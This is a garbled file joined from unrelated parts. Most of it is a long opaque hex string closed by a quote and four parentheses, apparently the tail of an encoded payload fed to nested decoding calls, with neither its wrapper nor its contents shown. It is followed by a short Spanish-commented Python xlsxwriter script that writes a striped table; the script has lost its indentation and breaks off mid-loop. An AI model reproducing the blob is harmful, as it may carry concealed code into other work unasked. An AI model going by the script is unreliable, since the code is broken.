E6D354D57C7ED8379FA692FE878BE6F35FC3DEB7565A1FE5F0754C98E5138ADD4C28763DA88CF1E7868AF0D91AA2B2DBEC75611009833C8219016029AA8783BCA55808497C15F9558E50CB8B7E7A8B3A1C454C22BB2391332A9AB982F02DF829DE8A09AA0AE3DF8789E6C3D7AEB8C8D34BFC6DC8B8907CC355C911FF536438EC0A49503E127F07362397797C2A2DBFC0430F5A469EF46E9CC3966273AE7E8BE7BD65312737EAE4C6B89A535E8E3BB989D220462408D1CCCCB3C8632135C5945AE0B150E926D5636AA80DFE7BAF7686CADF533D2A337E5DEBB97A201456CC1DF27D361423F6C9F425035850CDB47605D13F820775F512D813D786FE38F331A1A47E28D290067D0E222251FEC42DBA91DBE4DEA414D84108BAACF80799E46451A7E01188940B2185BA06FE4DD35AAEDF89559033B4654FF8021259522D53C493D2AC5B246FCB1B74D324811CD7DAC244E24822C5C9A0FD2731B9C18258667C15E7F1733E4D9FD3B554E4CCB2B425DF1C96254DE283B70BDD6463686B510DD4C46E833AFC7E4B98DB36D6299BE04A06BD6A07C62A1A8A1E69A2800A4225823BC2D1707EE45E7BD01D0E95D57002F0EF02B0BDFA778ACFF0312A54994875F1F8083CD216915C4B0D322A156F4F522161C2D48C020C5B2A5E4885D042DC5FB3E379EAEDAF86ADBC4901126AE6BAA500965A3D4AEA95161152806B62B8EA146DB7C83EAB47B07058E6D59CA2D79C42710A7AB01672E38213275D050F5DF50C8568408C5A47D8EF0B381D1E1F0B07ABA79854EDA48EE915FDB409754CBD547790B39CFBE85EEBAD083D2A675A3337D0FE0AB9FB1D1C739E44661E795F3E1637B40B1E2B5A662CB21D2B3B202C901B4C41869E072DC6659227B61E5DEFC4CAD8CD9968A65C85FFB3B399DDCE8A7A91AAEE61C45443FD6D7E1D323229AFAC0E99D19F2F1D11CEFACF05F2CF575930132BAA488F39AF2B952C3B9D9300B29CE1D8A3819DCF020247BDAC6C6DACD8FD788D93DE5FCA59799DABCAF3BDE5A6B033700AC4C789CE547A7BC55AF18D1ABD91B288A36CC40455B06F68B1239FF175FA8BAF7A721129D5C4F9144E01A6675E494C900559E9B228D72238F8DAA45824C1745EBB9C78D2ABE7DB98E558B1B59647A546019BB89AB1C8E6CB2FE6C05578880544B38A79039F2C6BE9826A9398236DA4CD94B96CAAB7C486ECDFEEA766AA3509FB293F7142F4CF3BFC644A8343AB94F56D43051D29795CA59AB02A8179DFE2442ED1526410823B46047382ADCC75825A46E771EE72B738C9FAA3B292AEE5346E9802DFC82AA55D56E0E7F790764911ED1224EE6F266AA489484AB4ADEA1534481868962EF8450F39A9908B508D285963B925BCB485E266F4529F416E3EEF62552A0EF440379FF3FEE818A2F4A03F3A868899B1DB1F1D439436F98621DC845FE53C0564936BCB75FB7C1C179499A10811402717345B7516947A44D67A6A75C8BE5E22912470E9F1E9C425CB056617514323C1633F34DE1F7FA7245D9FA49487D2BB4CEA46BE0C7F91097DAE1C9E5BE250658424B716574BBF3C36EA0C8BBD553E664324C063F1FDEC35E7B1E8F54E6C7EA5098AF24AC39D2C506978D2AB2EDC16502726EBA002F05E3BEC21F42107ACF53DF656E1673F2E0AB52C38882AE53DF5BEAFDA2DFC44E0167E3430C0CD81C000375D32F69A5E5FEC4A1765AFA02B5D65113A7E3ABF087DC6B48D746159CBF090C7B43F3F83AFA5497E05A162218E970A8A762CBECD85D2F0C7D4CB347E9BCD6537AC707F43BCEC30813FFDEA865159E096755111F3588651A188779E302A1E2D2D7069C2B42E84C23FD4BD867C314F567E4111715266AEFF07054DDD4238A7C9DB64BE87466FDCD615858BADAC17A308D792D81C65D37CE0761E7AAEC3F5B7F3EA32F9041AD8EA610C0F4C925AC7CDA78BEE35A11210ADE28899E571956F3793135033F17F366A3231AC733713666D78DDCD12DC9E6E33F18608B31405FA802260DE1EC13BBDAEB1E2ED1639682F0DDA8A710DD75A69DC16CFB86DF0E976321E6D8504B95B598FBD45AA4E6FFD0123560B58C6369ADA1B43C80A6FC5AAC041125FE882D69DC2930B3842EE9F062C1EF5B91BFADC26FB74EADFB043818312CBF807B09CB6D3727A277280707D15FECFBA9C20CE6307E7B4770A25AB62ABEE46EEDB382077A3196C0890F300E2F7290E0A99C69D034603A3923B34BF47C94AE2D58D3B13F1882088F01F1D3C6039E085C224273CBDF1D7E1DC1B4A6633F3E6022F3E3268E593D3F3B9A4BDD23708E4796ADAD4FB06535A660132036766FA06F56CC698965D99BADB4F9CFC2A3E8A73405FF5DD699899B660588327E2F10BF1C499F34F1C3D7B660698A913F1F347CF9DD87D1826E9E735DFEBBCF180B8D1233E7ED5B549F4C60CBC4E562BEB8F2C2C1C0FB26A186C522C97B245BEA9FB82C3041A2796AB1EF0A4581DBF9EEA3CE23AB2DB7156CAEAC35D339DD332255D7B175E9552DF5D1B2539D609E641F2DF9F63C22106960ED02506770D32B47C72919B23A2823E8E1157E2280889238717C758D771B40788A3712035B909CF921531726BC435172E9F711030923514B482F351C41DE13E594AF3D0BD1225E3B8CB665A5BA69E302A38DF9AB42BAF331954D7CC2C5B6E3C5C0A271E91BB2DFE4659BE0C2C261F25CB7F7341D68EBF063F1711ABE708AB07535CB5F0978B915BE1AA5D38E670579D30B1639B94268A9DDBA634502DEC05C38FD4015DD02E9832A813DA86C263E11A2344C6F8E91CD2DEBED7D4C28DAA83AEADEE2411B12245BADC57458A88BD9E2A9F774F49887A1CEB25758224480D921228F36D72621986C85CBE5598CBBB28B00D6DD9B9217B0B13916E4F7B67E2CC6165276A7267AEF7284863D491313C9D932024DA114E96902FC0529B50924AEBFE4DC2BC0AE5BF327AAE3896214A82E42861EB6132890F09732C74C0C1EB1E96D84C995E241CE4D90F612C0262E111BCB3C54348343031E8161AB4910889461AB7C1332E1EA0D749EF722B05F605FC3ECCE5B4DB90DE21AD7108E5DD741B4DF88978D82E2B9F0A791BC2BF5937482F36E382DF926F44B85EDD38AEBF5BA66D5F00B81486362532D897EBC9C3098B0D8A5403E9031F943FE242795BB30B9EB0B58E7990A13BE8A3C7832155F554DE3032C1D8D323CBFD8E2223EADD57A3564B02386DF08089DE60047BD2CC98D6A2CFC1D7835F013D948A4BBDDFED658915571D3CFA794C7E9349D9A2833DE3BF81C96731F91C261571A5EB0B40F2111E45974E74431144FC97B0EC7725728CFF1626BF83C9A730F93D4C10B1C57F1F933FC0E40F599000E1D7E1E75DE18AF2C4A870EB6A73B49F1CBDB5128A5228665607A1B872682D2AD05A53A8CD8FCA7C522AD4D8BEC6A4544171B5F4F622F1D52BEE53591E1222831520BE3A6560E848BF146B30A06A8C5715554A9A04D9C98FFA7B3F15BF723130B2D598BF6BA292C93E30204A564945FF34F607B49AE0AD2E6210437FEDA0C85F93DE31F65941CDEE47D02D0C9DB4BE080F8D103E1B76E2265517742B4898F797AC4A61DE7F0914E6BD1428CC7B5FA030EF6D81D1AA539E785BCF1745E1E2F1B6FE5D51142E1E6FEBD34551B81AA9F4F7BC51B89AB8E8B0B9587448FE26F7300A1789EE273760979B0988C5F545B9204C3D21399716BA44A792A2A20437484EA0653409086CEC9EF49CBEDA880E3318B733B198A3A68B39EF7D8F7C929449055884254B0F27F6A7B8F41EA2C5543E0C74A0D4B29679A4961DF79A0FF909E5EA6A58A9CC8A00A18F368CEE011FDCF5574139A1B0616991B62DE41CC67D4CB8FD89DD2AE3A7BB82CBA74854D98C82CB0BC48D90784FC4642691658D08168405E85C42EDBD4E247A872786B32B87FB229B057ADCEEC42EA14D37DCEB12A438F6C9BD2A70B69BA43CF2190AF0F363CECBFB01453ACD965483FD59838C478F3CFCEE934E14E8D2BA4F40DDCD54EB2F1471445EAF606F14E055829AEC61181DCDB52D69765D468A6C45B6DC3FDC78B7C2BDA32C88BB40625175590C6EFB81A457B0ED07A7F837C636B8024421DE42EEA4D923C49214B25AE419B19D39943009AF643D970B423AA1A1B9F8A9268BBC0226D27B2D3AF12A889086279F312DBF48CAE9BF2A3154B1BE94CC03D45B8BF08D937943B3316A0C11B31DFE7A97EC6C2E67E8C5360447332A45BB51B3C964219F870AEB38ED6E9C982F2B0073E2C9F0F8FCBA04B244DA13A0277B0212603D2D61F6E3C6EA5C56CBEB6732364CBC90E307499DB870921F6C85C41109C4F2463A7BD3F09CA841FEA3B59262F09843D24132B030F100363A39EB69FAD10240FB1FC34F3D407EEB5A315511E2A76570BAA253D802349098AA9D6879F81B6AE531599C682CFC0C8D06A2F2BD258408A25E4490B8D788E05B80089E590711B832A9C3528324823334FA2236720D52486A90C8781D7142B3C7FFAF9566F8D734C31621B212068C6D2E5FE11BC47318408D1CA4460E1221B55ABBB0BF4724544B112043E409D82E5DEE5C24942004D205F865934044F5CCEE2061503D85FC2744544741637881086687E01B4BF8D3007C16B77D88E88DCAACBE85BCF43A2422DA8A53424454871A302902DAE67DE6D94CC1F9784D2179144049B5CC05A8D5C300BF08447490EAEE08AC8B58A501910F2016AC7B8DEAA22CCADEEAC72AEAFDC52AA5D84146EB77D89812087917A1E5BC21D2CB6B37908B7100BE1F2F14C9BE302CEC9C21A2E959D538CC21E7251DE144B3417284EB1F1F1E1EDE5FE4E6773C18717294B151D4B941555EFCB7995703573502FD6EC19DEBA0C66D1B468D6315F1E388447C1C493633C9DC5442947F8AC9D73029427D5189FA84E5BF4D022C4275D99C071DD67BD061FC7F60F15FB0200EFB4FE0E7E11AC77DA398C396B830D8CA5F62C74D5561C7609CF883F71A273E18BABAFA96D71C4E9451C8B869089A803896FCED32E8B13B433E258FED3E73ECF6F9946AE594EA18326675AC223E8CDC253EBC1A880F298E31F6E9E2C3563F3E7419B37AC25BDB025FCBDB8AF0E1980F77FAEB3EE1BCE88590CB98F123B7CBBC7581421DC6ECFB5D745BC498EDBC7F283438AE2900D240E7EF97E77A3E5D150E15AEE7D97BE87B1E841C27EF13725C97F8C0575CCEF1BD4C2081BBC6B00135368061832217080C6BF9D4390E7ABDB788F32E1544D522CE08E13BF832EB20CC3FAB84353DA1497F9609F91F10230BE42BC915513F83C9CF0722CB2FE1DEAE29AB102A8F2C25A2E4A577C94AD67BD1E653F71A6DFE2DB09267AB459B2ECEAC802B85D9412599E24725369DB9FE3EF730618C4F13E181C0BDEC6310F25B3D27E590752464F4C82179019A40D098744C2F728E88E136C9DB5E74377BE38B4C067EB150FC07D7574938D98D468EAE70B247F89AE1409B1C1CB859DA3814E3C02F288E44B0B85A090E5442F2E0B9D2BA4F38B31BF3E040FEA9E87CE1D226C538F009171D17E1C0EDF70F07BE2242C6BB0E0773B7C2C9F51009C70CE50C1BEF5AA8E9BAF0F918B3FE8A68C36D749788A30AA4FE1D27D0AC8C7C08E520D8F7E19B113FD2797A7DCCE39EF28B9323CDAF1B199BDB2720AEE1F1655B02B10E2E989710EBE8EB601D6E53C7C5953BC99ACEC1346429B7216CD3E8C5361FBDD7D8E62830699F794D3369BE01DBDD012372C0881CB05672749504971F25D16697C074F59EFEEB8977F33D54A03DFF39C9D835140B3A1B4A18BB062F63D750C2D8CD026727DFC95F12A6BBAA5CADC8EDD555E0F65CE9E71B2A707BC5D2CFDB15B8BD62E9E7875CD66DEBABC6BA7D57493F5F191C8D9606AF301AE604FD8670EAAB8F4EBFE3059846FAAE05988D1221C6BF8E0999DFFD2F4CFE0F636CA3A8F1CBF0F3D5BB63C8B6DE35B20C66C8B47B8D22FF1118B278B52852B062B74302B1B811DF833CD35CB62C528E2DAB71D9B25A0F5B565BCA967942763A63B86C598DCB9645882DAB2961CB6ABC6C594D005B76C7617C560959DD01B6EC4E05B62C52155BF6DF36C096D555C5961DBA5BB6EC8DAFB365F79D2D5BDE080A2961CBC88A72A378C46DF49A65CBB6B3CA6C99FAAAF1658BB957882F431160269BB6788077578316A2723272CC100E2A453F77E067173C9C35BF0EFA69A058EFAFF366AFF366AFF366F7037755E2CD3C16FEAFF366F78137DB1062AD02A7EEAF88533305D4DCBD1CA45A14C3E99CB66C108A14A7F6BD7699326EE4FECA3265DF74702231657FC3AA60CABE023F4F465E2DA6EC75B7A98D814A746F08709B3A06DDC50D8D16AF258F9DBC98B56C52B807384FF91B70AB00AA7F20A0FE28AF7F3C9B4E1B19DBD77D9087D398BFBAA7F320B7ACF141D8B496A5CE1829C336CAF73A31A81E053897932801A67FA36040E5C028479383EA95CCFC7DF290C28F3E97B5D777904297DCE723AF3B48BD261DA4E27F84C9CBF38FFA7B26FCA360E5171279DC60C27FAE90139772B12C6771773837DD4B9D36420EF6013FE990163D3FDC4AACE8385A6BBA1E51D05B40783D9CCA4B91BBF588F2C1E597BE33E0B21724B7DF3F90BC2318248B1A67CD6523B04ACCAD92BD6910251500774595D9ECADC04EC69C1AA7B5452DB09371A7CA254D0F8C1A37E1D4389A59C8AFDE97A070B417D60798FF0F7E7E131771FF06006629B8FC876AC1E56F7BC0E5715CB25AC8018F3FED018F0984889E7BEFF780C3372104F4DC7BB307FCBD8010CF736F8EB92741FD2472969E7B27E95E0BDDFB3CF2719E7B1C78B6D1BDAF7A03D3B573E0D9510C3C3B5F19E049F0E6EC99C74F1014E557179E3841E0944C9C672FCC1258A55BA78F9E3E4AF0956E5D3A3AC31D5171B11C3D7F2AFEE45D015B37B65D5811E3D8668E9F5048AB8AB0AC0B1DB565CB2C5D58D8F6CF7061D129B021173AD656913A50D2770AECC7EEF5A1CEC7956AE3D7B871CF436CF5ABCC0D79A7D0E1293D6B218E602B86C06BC5C5E717B5644918D3CA7A31A4DDCCF58438541665FE28ABE13A0331E9068AFAD2480E38740C6B273F7A558C8987A9A2DC66135331D079374599C1696DE6554F9DBEF1753CF9B0571EBB45E2A367F8B15B51114E46B17B84A4649FE3FAF91185479109A8E6C836B6DD3FECF0100B946DCCA8E58267F7FB47170DCEA2EF4A69E5F52420B8ED1D3718C3D0850F0C9D4C52EC04B33191013FD619BAF418D6E29B19CA4BAEE288BD9A33024D9B5B992335784AF468E26BE3720792E1AA0416F0682651D1050BE875E21128C877C103A6A84296508D24A6C7FFA6E19BB850A677A358AD1A413877914480C4F9FDC7306980C7E5D155DC68CE08C1486640279C7A1D480C11062C2D0E6BCD2E92A708E7F7DF1988431B618016189A1F6A5A362E0A32F87B28FA4994CE7A685676297BE9FCCEA293EC5F270D5F270DEF1569D82491F8C2FAB4E1B7E02756FB3A6DF85AA10DE3358AE4AE238A64B16B15C967D72992D9AE5724C71D55EE92E37689C04E45C050095D61EDB81460BC49095A3AD8E8B1DA974BFDD57B01E197EE35F577FBAEA8BF52D2AF02C9A79373B708F0E1D28DADAE2B78683D8D5D98E8C68E52BA911F3BC7D57409D4EC71E20F43243B2E001EBAB19B4749EE11746393876EDC4CD6FFBD9C6EDC8287B512DDB8CDA11BF72940376E2F4337EE2847377283929D2CA0DAABE1AD1D7C16A673D0E9CB231B5F0B8E696AE539DC1C1D1CBE97F46BBC1901874BBBAE474907D2B69509D9788B2220DB3F313AB681493A96423B554BCB3A461CF136ACD78E0911AFE8DB15EF502A93B15D703F87307BA602BA47488E5AA9E66A89591F0CFFE57B0DC3E72AC2702266CB1E591615867E18DD9502C102B446069DC2D3AE7E594488F202EBB01F58D7A0DE71890E0F5F22A3001E05AA04582F134BEF00EBA78A8075BB70CF7A8647515DEAA4311158770B04D1E307D6210EAC1B28E6ED160EACB712A06E4340BD8DCC003761C73E40BDDD6FF9B78F8C1CF0857F4AF106DEF0557B358C17C65910E0BD62399AFC7D8F1CDE278B6184BC9A316ED151831B160D0437107A362B20F2F7869002EEB347647CF2574FB0500C9851B93A9414CF78440457DD905881C3E1A622387C7FE0EFE6BB83BFEF581F0853C070541A79E0EFFA50978406CB690E7CF14C490E72D18B96E42EF3A5801719A417D603BC1102BD4D6404500C78770501DE062FE0FDF6BD06BC2FDE33C0BB552905BC1500AECE63EE7510892D5A7A024584F9218F1E9F59DE43ADEC81A86571B2870F64D7A100B517E02D07D914DC1BE06E2F5ABC71901DF582EC2D8C4E87DE2A40769B07646F2390BDDD01D93B38C8DE4920FB3104D96A1990BDAB1CC8FE7B02D9BB5940350764EFB97F207B9A0581C553858CB62CC3DCF8C1F6958C5D58568F6979D3C2B4501E7473EABC14B80693F30EE87E0521F7CBA2ED1F611BA0EDFFA990F66530CC77173A894A745244D207A114F7584022E47B02A8793F6A896F0E14C3FC23FCFC126296C7AAC42C9CB4AF0ABFE0BB708CAEBF51825F4E07E317402D4B1114F27922AFD221F41879B55E6004048F1180AC61818EA204E37E90D051AD8B8E5C794623C269BA682A23D426913521A02E12650322E8E6E14A85738FBC2726D8CC3C48864FB0464E30C256BE2E03B5CE5CFFB224DFF9715400E9D1449AF712781415EF2D2A7B6B60ABA34C1C45850CC1ED4626E22F74038668750F1AEEC1137F01AFA061F88D6FC26B69A3D7F26F853AAE6C0B3AB40991553D9B84A951D31A140801CEC20E7E5771AC993B1DB90C0F2A0B75AFC2FF592EB529BE5B85C4E6C1CA90216D1499D60645D47979A8687F205EA0F8DE12B64A28B1D72A63287DC9D6F2E41AC2C36FAA169DCB20011046D1195EEF398710021F291330871F24B11E14459DEA117E68EE343761F203712258C91D85827FCA53125A5911C60910A18439ACF50AA0C5C38FA74F7233DF0060ED025247EA32918ED32BD2D73BFAB51A385DF1E086FE4DE5207559305CF944A37748207D793567F0B0ABAE55F09884CFFD4D123493BE30A3A5E937954DF13384F042B30ADC30C22A581C4EE347E667D69BF92C39D670DDE2727C4B20DCFE36FCFC991F6E6FA270062D25D03B4A909A9F42DFA0D48A63835A94BD04B99B8541706BC881DB3E938ACFDE6BBEA0B2763138664E756E3276ABF49481223CBEE62BAC8C7B0CC5D8E5DE311E92FEE7DCD83A2F49AF990E02D9E40ED38BF0D8175C2EC87B062035CE839E19E7F0568CB22D3BE8E19E2B9BFD3DF6FA0FD953D66FB1A5B8C5AC637DE17BD0FB6D79B12112BA5AC7C7BC303A3E42D46A200D8D9BE4A9EBDCBDB1C821EF7C567A8AA8B2A32A00CD068FF0E9ABF251AC216EC301B8A6AC9B25EE7FDF8B7CD0CF04946100825B94399EAEC5ADAC0A68DEE6426EF598915FD42C33B50EBCED2C076FEF52D0FDA404A91CFC22A4738D3138B54B209EA2B7FEBC84AD0B9A45546F29CC44A5730774601D73606690F81AE163B77092E08E1548ED769063455388DC2B5C5859EB8595FABD86957F511DACF49CE8897619A757D73C4A4897AAE6B04A91B02AC4562E1261DD84106F86842D1CFE01ECC31C10B322C2582BC95A2245520B028C9C968D90A4E257D92C7F524E87EE4132924412ED747D86C8CA4E7CF20E71B4AA6277BA22894D4177088475DF3F10B6C19DDFEBB6463F27B9D58E5F8E9F7DF0F85DFB76131D7845D20934A7EABA29941132EC70A729CF02E3649928BCAE5A0898D4E9C36A39F7AD974D9E756D185C543C57928C0F38D54BDAB13319DD58E154DA9F3AB086083437183E9E6215CF49F041F419BDE152D8A1C0029942D8F16805D8D140BCB202F724B5D500B5F0CCFBB0E3B2156CC3F5E3ECB56EC3E535DF6ABB7FDBAFCC11EBB379D336547EFA1DC9BA02ECB7C80F71369BD7F1846D3A172EC082EB683209B3B2D5E38B4672D9C807DA688D0DAA67A10B2E580C1C6D7C50BD98CF92CFE3A98296D7EFCB8150649D95486966A69289D612FC2470E1F65558B8EB1968FD6756A581D6FB027D9DDE16E8EB940AF4757A22D0D7E9D1405FA70381BE4E5D32960BB2087E332B7C95F7CA7FE96E6CA8EA1DC0B44F9A4F71C941FC57E4574EE2C24C68CBB048B1368A062D6D55E387E4E25AF378226159D65E34F2A5CB00FBBF89CBE001FAB8EBB92209F3AA1A2F8C6A79ED70826B8AB4D8FB382388E5688850D8479D7D8FD4C6377376B1C5C72E72954E48AA74C2A4D2692DA29DDA88EAE1C1744A06B8DF5EA7432C889EE770D0F29F025AED5AAE0685A3B37E15622B2174BA78E1D2E5BE4AFAE10D5253C13A1E71E8E99919C9B2B801AE0979B76F149CF22D8890B2B284BEBF46C259E234D2D602FDE60D8B7CBF4B771D6ECBF7E0AE1BAC007CC55E845DB75548D59B258D802BEB37E5FE1B8BDCE3FDF75B3557573F5AB32E99E0DD908EB65686C4423B41AE96C5DBCD72774585230B4A51A450429C5DD32604252820A740FEBBF038653AC50678835DA846ADC5DC4E3C18D9994997D8F49B8484DC8E0A95ECED46CAD379C9B79B10868AD0516B4D4EFFCD789EB1ECBF852EB0FF5682088DA8B38587015E0653628244A64616D6C842A782732B429774E8F35AC4F3AFE896824F8529E935D6EA298D52855A4AEB28ADA7344A4D6A2925350396D7507984CA23541EA1F208950776AE94E93C5CA6F39A329D7B1FAA4EF65F4FB7F8659DCC3B97FC6EBDA75A54E6A3325FE7E9272C5B8565498D2CA9912511591291250AAA493025635BF8AE78594B6923A5143B0733612A0953490D95D450490D95D452DA28BB0ACB5B8D345623FD6B9243389D34D1DD26396E33A52D94B65293664A5B286D159DCC7F8E750BEEF9761B5B19676B6D681AB00C60A5A706F3B5AC076EF095B9465CFB1A6D19B21CC09637BE129EC5D6EDD4BA5DB6BE5283796CDD2E5B3750EB767FEB5D35D4BA835A77C8D63F5483796CDD215B937473ADC3DF3AC15B7752EB4ED9FAB76A308FAD3B65EB466ADDE96FFD819A59BCDDCC83EF7098C48F71C263C5294A8FC712B8451835EC77A0DB504401C8516232DCF2AA990C8F783A3BE24ADD2C53D5355B535346666159CBA936B72ED3CD39ED96B648A47919E9DE8C9173ED210E71AEDC3D143CF82C736A781986D2163D2D83D55C54F7989142B38B054FEDE06336A8F645A8B960A67CD33A1C58FD32D6D452EA596DD1CCAB8785FEC75839A4AECDCC9C3BF7E4936B6E17A4E132116F9A74C4C0FE8037399A7E5C4B65D5C7B2E939F8B9F4F8998BAAB6A4A9876E567A8317B5A496F74C35E898A592272B6E3453C5F3F136959F72A304D0B760A5EDB5F65A0D983899EF8EC4FFF3329A56FFF39A4B4CE42FB91E7681D19FBF3D422B3840AC7629303A93BAD74278510DADBF4E1CA7FED6BBA3AB496A47220E12E89F91B4361700921C8EAC54DE83099D2AF2634C9842EA711A134D57E87A81D2452EECC7EC12A5CB94A6284DC7FF9609E5E9AD051E8F3E434A965BD9BCCE150446A69452477EFB25A4D457022975198249868D6F127F9B8956772D641A44C9B7D9B7812CAEA5D04C3B43E57EB17694AC665A5DAB197C850ECFFDE8BD0E55F82FAA900BCA2B588140EA631AA234CC56F77A3C9D9C73B9F8CC884D061A9F1B21F299FD39CDAC88616FF485286C16EC00500B25BEEF77900899B9FE8768838941FB886E0046DE51B0C2BF3786D0BAE63631194015720D45949BE1239FC01D9D1A24ABC0830E36D219C9C430E009CB4DA4A9FD610575239BA4D5A6DEC9FBEBE2FD91ED3C9AE1345100426CF01B0A12336E839ED206E8EAE556D85C5A6116BDED5BD16B8A07C02572690BEB116521A76CAB5316F65B80FADEEAFD56F87A8D17FDF40F06902BE1D70B9691C7A3A2D6729A65E1062D43D1B851F9BC5ACBA23880546943C76A95112F00C995D7EC6CBE74C40D62EF67992B3C991BD07266B1F0048526435AC15E1CA477EBD7FAC4462727C7A7A686A7C6A74626C6C7F7C6C663E393C787E747C686356DCED0E7E726C6B5646C529B1C9D32F4112D169B189D1BE99BCFE6D39A3DBD6465337D96BE9CB869E42D330BDDF5D1B1EFD3249BEE4B65935ACA983632892B97FAE4DB9FB650D481ADA6CDACD50780D2801761242C9814749148C2CC4DC39A1EE9B3CC85E9D1F9F1F1F1F9A92998C7C87C529FD4B4E1E4D8D8FCF8C1F9F158CC989F88E3EB25796391A6E9ACE9D13339125204CDEA9A4A0BEED6AD5BBE57157F736057A36912DB3B7DC9AEF614571C49CF9801438E0723528A8B58B25671D6D3E2092CDC39F206CD615A4C886C6AE51D18745AF4D3DF7377C8F3A724B6E468F48398FCB0834BCB4AABC878144D46FB9B2592252498828788FF1B260458BA6910D615B72C9BCCC27246DAB4B4452A4C1BCB66FCA3D80512073CE02F29237F9405C9BBF60360F82BC4A29703B1A88B436BE96F183066AF279821977DED52BA29F82F62D72EA50D5368B92934EDB54F72EC4A3BEE3586FC89EA9C7E5D34B5FA85D2D3BD02B5ED4F93B6BD11B5ED19A96D6F72B4EDCD5CDB1E2207805612AAD5226A586A432C4812AD5AC2651194A1490DBCDD210E754483A00EBA8CC8CB3A1473A17DD0A7D92C201DBB13BB7B86C7C2455D3BF6C7ED36ED4DD2C1C117F6DD1BE1F63DA4BCEFC157585C39B306757BA9D62F2B22A0FB16079B6F0E6C728607C5DDCA96B651C3AFB9B1E5B7F31A2E15D1ECC6922FE947F2FC5BEF1FCEDB205288B1F524EAE41FB08E09800C5A67EAAE34803B1F1CF44C47F0A2E5FC074A11DC86AC86EADDF730BD4E90598FC73405998D058C538E83711FB31A9C5E45B0D98033382BC7A2AD36267CFF8E0D03F9CA260DF5022EBB0E012E1FE506A975B5176EB85A8A761B14C6DD8D668330BBB0C859A282CECD501D0B8832EE0207A07417F463BDB102804730EE358168857BED90B6D2F98D11118F36385A7B83D78100A7E6B042DD55A91FB51A01E82315013D59D84B405F5F46FD185DCF44C26E90FC0AF30403F94504D708F11B11B122191F82DEAF784282FC096A225045C26B84788D51AAD14135BEC1A49FC2762AEDA4D246F452A0D23A267204ECBAEE1FB0439A3BC01EE344469B4B1934548025C60CD013787B43561195D5F44E243C3B5F3078243C5C29F35ACA3248154FCA4F0A581AB821CF55DC95F8E4C298F069BEB368EF60497C58116369CBB639CF6DBCB301128507A1DE65DC2A13581AAA6C7881B2835AA52D2453AE854FE267C087740C317076B03C614974E30AA3E5CA19455C4EB4099007AD91CE9261DC1FBD9768E6E729B4F7067C2DF65A5C9F1AA904A35C9D28A70E0715F1EA0AA65EF25278AC55C34E20E367EA2BF87AEA0992F0F31E9258CD47DEFD1DA35D0F0FCC9F51A7E7B515C10A0331D20DCF694A3830C1FD86BA619F4F6034955AC669A82552BCE9A4F7D2EB398914E24AC7A51AEEF8C3B3C8C77F8C0942B0411282B4E961CB7709B3280019829C9141732F90BCC1E9E2CF2B76D116D805E92709A8F8ED0BAC7F8EB61B5ADEA43D34FDA6DDC3BB0FBD69B76925AC4574DD33F4DD87D4BDD643BB25976642C1EEA9B9C983235323C9818363F3FAC09836373130076CE3C0C8D4DCE8D4FCF098363197DCFDD06E2D097C2E6FB1D782EB64CA343276225DB035DBE96B6E78746442D7270646E721199B33809735F4B181B9B9D854725C4F4E8CCD0DEFBE7DBB4F180160D8DC3E3D9B84C6D323639393C363A3B1A9D8E8C4E4C8C1D1BE1B0523BF9A409E7FFA8C75493CC025C33E2746ECB3ECBC994BE8C6BC5648D9D6346E6F519629A452A2C0C7BD8A39931D17F49DCCEAC63414CFCF2580E34EE48D1B096E0D99AA38AEA80EFDA68C7C2299029638B82679196AB95CCA4CD2F5D0CA00B0AB03C8760F14F229238313D0C939F1783663C3D406D05F84D6F985A3C0EBC3C7A2E8F398CFE6CDA779AFBB2BEF4D2ABA91223290B8B44543D381B3277AC7BF180822769503E05E2FD8F2E4E151A07B6E02EB5F9518A5B3640A04867D2709941B0A38730AE8C2076B63A574160FB57F5AF1F1BC8F49F0E301EE45961C45D40E421483B014A76F889E7E4CF182AD52183E03A56F4120250338772B9BC983A69E881A0EC1D172C37F155188724B24D29A994924FA43F23B5C01B0377074019D5C677139E48CBC363435787058ED3F9AD1F359537F58A542F59C9931874627066383B1D8F8D8D0C8C8D4E0C868EC61F5CAC3AAA9EF572FE60DCBCE0EC50647628363B151F5092EE41982CB9189FE45E7C5D44A0C4713D2E125DB266C538AD3A565F46C3AFE28D6A063BC9F73803BCA45E2CF382F1B6D806C5C5069D892662E9F451C0134EF602E9B4DE1B1063C9EF099742E9BB7B9C52D7E101BD785F4B1183456308636AE744E8C86E447C91BA9ACA6DBB88E2DC3161B9F76110C1147E469B7F37B89459872CA48E4B3186E9B70F0495C68B2AD73DF9887D7B3481512B8A768F2A72F5FBE18E7772EF24780D9E247D1745D6C265A339C24A7C5440E0D1FC2E47D987C18938F60F223987C1593FF89C95F314935FF6F4CFE2F26DFC004B157BC951C1530411236DE8BC9114C3E8F77D1BC87531EA8D6893F8509AA7AE2F4112D4C6C4C0A98BC17939B98DCC204AD86E3A8B088FF2226AB987C06935FC3E4D731A1032FBE88C91F63F227987C091392477D19133C93898EA0E0BE1618B49C823E53805E0A5D4971FE7898370C0144E128C87398DCD0C8AF820CA4F9C6435343B27C22A50AC984886F208A886FE4295A5B8A58960982CBB04F9CFDE7A319B0CA23E9AC5E48198791B0B03E09C98B4A1B1054281C6A0FC9DF36F845FE010547DB94A6703412ADAD0D45A3B54A557FC3D187A343D1BEE8A9E8E6A81AFDFEE89EE881684BB41B728F40DA15ED8C1E891E8EF646774747A3935086FF0FC27F2CD90CED1EA0741FFC3D007FF741BE27BA0DFE1E8B8E408B07A2754D5B9B94FF0F4E747D45"))))
|
#!/usr/bin/env python
#coding:utf-8
import xlsxwriter
datos = [{'item1':1, 'item2':2, 'item3':3 }, {'item1':1, 'item2':3, 'item3':5 }]
# Seteo las filay columna inicial
row = 0
col = 0
# Creo el libro y le agrego una hoja
workbook = xlsxwriter.Workbook('tablaConFormulas.xlsx')
worksheet = workbook.add_worksheet()
# Creo los formatos
encabezado = workbook.add_format({'bold': True, 'bg_color':'blue'})
filaGris = workbook.add_format({'bg_color':'gray'})
filaBlanca = workbook.add_format({})
# Escribo el encabezado de la tabla
worksheet.write(row, col, 'item1', encabezado)
worksheet.write(row, col + 1, 'item2', encabezado)
worksheet.write(row, col + 2, 'item3', encabezado)
worksheet.write(row, col + 3, 'suma', encabezado)
row += 1
# Lleno la tabla de datos
for elem in datos:
if row%2==0:
tipoFila = filaGris
else:
tipoFila = filaBlanca
worksheet.write(row, col, elem['item1'], tipoFila)
worksheet.write(row, col + 1, elem['item2'], tipoFila)
worksheet.write(row, col + 2, elem['item3'], tipoFila)
rangoSuma = 'A' + str(row+1) +':C'+str(row+1) # Para formulas se comienza a indexar por 1
